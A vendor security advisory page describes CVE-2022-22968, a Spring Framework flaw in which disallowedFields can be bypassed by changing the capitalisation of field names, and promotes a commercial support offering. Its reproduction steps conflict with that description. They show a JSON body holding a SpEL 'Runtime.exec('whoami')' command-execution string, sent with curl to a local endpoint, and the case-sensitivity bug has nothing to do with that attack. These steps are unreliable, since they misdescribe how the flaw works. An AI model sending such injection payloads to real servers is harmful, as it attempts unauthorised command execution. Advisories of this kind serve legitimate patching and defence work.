By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

View all Vulnerabilities

CVE-2022-22968

Authorization Bypass

Affects

Spring Framework

<5.2.21, >=5.3.0 <5.3.19

Spring

Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

Overview

Spring is a Java framework typically used for enterprise and web applications, though it can be used for desktop applications, as well. It is composed of many modules and not all modules are used by every deployment.

‍

An authorization bypass vulnerability (CVE-2022-22968) has been identified in spring-context and spring-webmvc which allows attackers to utilize properties that the service has explicitly disabled through by providing the field name with different capitalization than was configured in disallowedFields.

‍

Per OWASP: Failure to ensure that users cannot act outside of their intended permissions “typically leads to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits.”

‍

This issue affects versions of spring-context and spring-webmvc from Spring Framework earlier than v5.2.21 and between v5.3.0 and v5.3.19.

‍

Details

Module Info

Product: Spring Framework
Affected packages: spring-context, spring-webmvc
Affected versions: <5.2.21, >=5.3.0 <5.3.19
GitHub repository: https://github.com/spring-projects/spring-framework
Published packages:some text
- https://central.sonatype.com/artifact/org.springframework/spring-context
- https://central.sonatype.com/artifact/org.springframework/spring-webmvc
Package manager: Maven

Fixed in: NES for Spring Framework v4.3.32

‍

Vulnerability Info

This Medium-severity vulnerability is found in the spring-context.jar and spring-webmvc.jar modules of the Spring Framework.

‍

The vulnerability relates to how Spring's DataBinder handles field protection. Developers try to prevent certain fields from being modified through web requests. However, a security bypass was identified due to a case-sensitivity issue, allowing attackers to manipulate restricted fields by altering the capitalization of field names.. The patterns for disallowedFields on a DataBinder are case sensitive, which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.

‍

Here is a practical example:

// In a Spring controller/configuration
dataBinder.setDisallowedFields("password");

// This protection can be bypassed by sending:
// Password=malicious   // Capital P
// or
// PASSWORD=malicious   // All caps

‍

The problem is that listing just "password" as a disallowed field only protects against exact case matches. It doesn't protect against:

Password
PASSWORD
pAssword

‍

It’s more complex with nested properties:

// If trying to protect
user.password

// You would need to protect all these variations:
"user.password"
"User.password"
"user.Password"
"User.Password"

‍

Steps To Reproduce

To reproduce this vulnerability in a controlled environment, you would need a Spring application running an affected version and configured to disallow field properties with susceptible field names.

‍

1. Set up a vulnerable Spring application:

Create a simple Spring Boot application using a vulnerable Spring Framework version, such as 5.3.17
Define a controller named UserController.java

Here @RequestBody binds the incoming JSON to a User object.

// Example Spring Controller
@RestController
public class UserController {
    @PostMapping("/user")
    public User saveUser(@RequestBody @Valid User user) {
        // User data binding happens here
        return userService.saveUser(user);
    }
}

‍

2. Add additional files to fill out the project. Launch the app.

3.Craft an attack payload:

Craft a request where the JSON payload exploits lax or misconfigured data binding rules. This could involve using special characters or sequences that the binding mechanism might not handle correctly, such as below:

{
    "username": "admin",
    "password": "pass",
    "role": "${T(java.lang.Runtime).getRuntime().exec('whoami')}"
}

‍

This example shows an attempt to execute system commands through string interpolation, which might be possible if there's a misconfiguration or vulnerability in how Spring processes these bindings (such as this vulnerability).

4. Send the malicious request:

curl -X POST \
http://localhost:8080/user \
-H 'Content-Type: application/json' \
-d '{"username": "admin", "password": "pass", "role": "${T(java.lang.Runtime).getRuntime().exec(''whoami'')}"}'

‍

5. Observe the impact:some text

Look for evidence that the command was executed, which could be logged in server logs, or visible if the server directly outputs command results.

Credits

VMWare

‍

Mitigation

Spring Framework 4 and 5 are no longer community-supported. The community support version will not receive any updates to address this issue. For more information, see here.

Users of the affected components should apply one of the following mitigations:

Upgrade affected applications to supported versions of Spring Framework.
Leverage a commercial support partner like HeroDevs for post-EOL security support.

‍